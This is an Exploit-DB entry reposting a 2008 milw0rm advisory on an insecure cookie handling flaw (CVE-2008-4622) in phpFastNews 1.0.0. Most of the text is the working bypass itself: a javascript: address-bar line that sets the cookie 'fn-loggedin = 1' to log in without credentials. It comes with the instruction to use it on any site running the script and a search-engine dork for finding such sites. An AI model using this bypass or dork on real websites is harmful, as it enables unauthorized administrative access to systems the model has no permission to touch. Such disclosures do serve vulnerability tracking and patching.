phpFastNews 1.0.0 Insecure Cookie Handling Vulnerability

2008-10-18T00:00:00
ID EDB-ID:6779
Type exploitdb
Reporter Qabandi
Modified 2008-10-18T00:00:00

Description

phpFastNews 1.0.0 Insecure Cookie Handling Vulnerability. CVE-2008-4622. Webapps exploit for php platform

                                        
                                            #################################################
##	Qabandi 	iqa[at]hotmail.fr      ##
##		from Kuwait		       ##
#################################################
\\	phpFastNews
//	 Insecure cookie handling
\\
//   Go to any website that has the script installed
\\	type the following code into the Adress Bar
//
\\	javascript:document.cookie = "fn-loggedin = 1";
//
\\	Refresh do whatever, and you will be logged in
//
\\		Dork:intext:"Powered by phpFastNews"
#################################################
##	Greetz: Killer Hack, Str0ke	       ##
#################################################
		PEACE

# milw0rm.com [2008-10-18]